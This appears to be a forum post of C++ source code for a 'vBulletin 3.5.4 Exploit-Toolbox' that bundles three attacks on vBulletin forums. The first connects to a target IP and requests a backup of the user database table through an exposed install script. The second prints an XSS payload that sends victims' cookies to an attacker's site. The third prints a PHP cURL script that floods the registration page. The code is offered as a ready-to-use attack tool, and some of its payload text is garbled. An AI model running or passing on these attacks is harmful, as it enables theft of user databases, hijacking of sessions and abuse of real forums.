This Box continue the 3 vbulletin exploits, under it you can use the vbulletin install path exploit, the other two exploits can be only watched.
Code:
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
using namespace std;
string exploit;
string answer;
string answer2;
long s;
sockaddr_in addr;
char IPaddr[1024];
/*You have to change to the right path*/
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
char stry[41943040];
long I;
long M, J, K, L;
int i;
int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;
if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: m4k3@pldsoft.com" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}
if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;
return 0;
}
close(s);
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}
else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << " "<< endl;
cout << endl;
cout << "'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << ""<< endl;
cout << endl;
cout << ""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl;
cout << "c=""+document.cookie' b='"""<< endl;
cout << endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "( 3 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Like Using"<< endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "1 new thread"<< endl;
cout << "2 href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL'"<< endl;
cout << "3 Submit"<< endl;
cout << "4 It waits for"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "# www.spiderz.tk " << endl;
cout << endl;
cout << "_______End of Exploit______" << endl;
}
else if (exploit == "3")
{
cout << "Script : vBulletin Version 3.5.4" << endl;
cout << endl;
cout << "site : www.vbulletin.com" << endl;
cout << endl;
cout << "Exploit by : x-boy" << endl;
cout << endl;
cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
cout << endl;
cout << "Type : Registration flood in register.php" << endl;
cout << endl;
cout << "Thanks to : Simo64" << endl;
cout << endl;
cout << endl;
cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
cout << endl;
cout << "cURL Must be activated (http://curl.haxx.se)" << endl;
cout << endl;
cout << "Sorry for my bad English :-)" << endl;
cout << endl;
cout << endl;
cout << "http://localhost/vb3 to the url of the script" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POST , 1) ;" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl;
cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl;
cout << "con" << endl;
cout << "firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm" << endl;
cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl;
cout << "corrections always on&options[showemail]=1');" << endl;
cout << endl;
cout << "curl_exec($ch);" << endl;
cout << endl;
cout << "curl_close($ch);" << endl;
cout << endl;
cout << "}" << endl;
cout << endl;
cout << "//Flood finished good luck" << endl;
cout << endl;
cout << "?>" << endl;
cout << endl;
cout << "____End of Exploit___" << endl;
}
else
{
cout << "File not found / Failed to open file" << endl;
}
cout << endl;
cout << endl;
cout << endl;
cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
cout << "Contact m4k3@pldsecurity[dot]de" << endl;
return 0;
}
More Informations by: PLDsoft.com